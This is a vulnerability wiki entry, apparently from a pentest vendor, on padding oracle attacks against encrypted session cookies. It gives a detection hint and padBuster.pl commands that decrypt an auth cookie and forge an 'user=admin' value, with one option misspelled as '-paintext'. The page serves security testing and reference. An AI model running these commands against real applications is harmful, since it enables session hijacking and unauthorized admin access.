Cobalt Logo
Menu Icon

Cobalt Vulnerability Wiki

Cobalt Vulnerability Wiki

Categories

Toggle Arrow IconV2 - AuthenticationToggle Arrow IconV3 - Session ManagementToggle Arrow IconV4 - Access ControlToggle Arrow IconV5 - Validation/SanitizationToggle Arrow IconV6 - Cryptography
Weak TLS configuration - Padding Oracle
Toggle Arrow IconV7 - Error LoggingToggle Arrow IconV8 - Data ProtectionToggle Arrow IconV9 - CommunicationsToggle Arrow IconV10 - Malicious CodeToggle Arrow IconV11 - Business LogicToggle Arrow IconV12 - Files ResourcesToggle Arrow IconV13 - APIToggle Arrow IconV14 - Config
Arrow Left

V6 - Cryptography

Weak TLS configuration - Padding Oracle

POC

Detection:


If you create an account and log in two times with this account, you can see that the cookie sent by the application didn't change. There is probably a Padding Oracle vuln. here



Exploitation:


Use: padBuster.pl URL EncryptedSample BlockSize [options]



/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV



/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV -paintext user=admin




Impact

Low-Medium (depends on the information disclosure)



Likelihood

Low-Medium


Ready to get started?

our platformschedule a demo
Aircall logoAlgolia logoCangageCredit KarmaDattoEgnyteHubspotMovinimageMulesoftPendoSentaraSmarshSnowSolarisTalkdeskVerifoneKubraAxel SpringerNuna

Join some of these great clients we're proud to have helped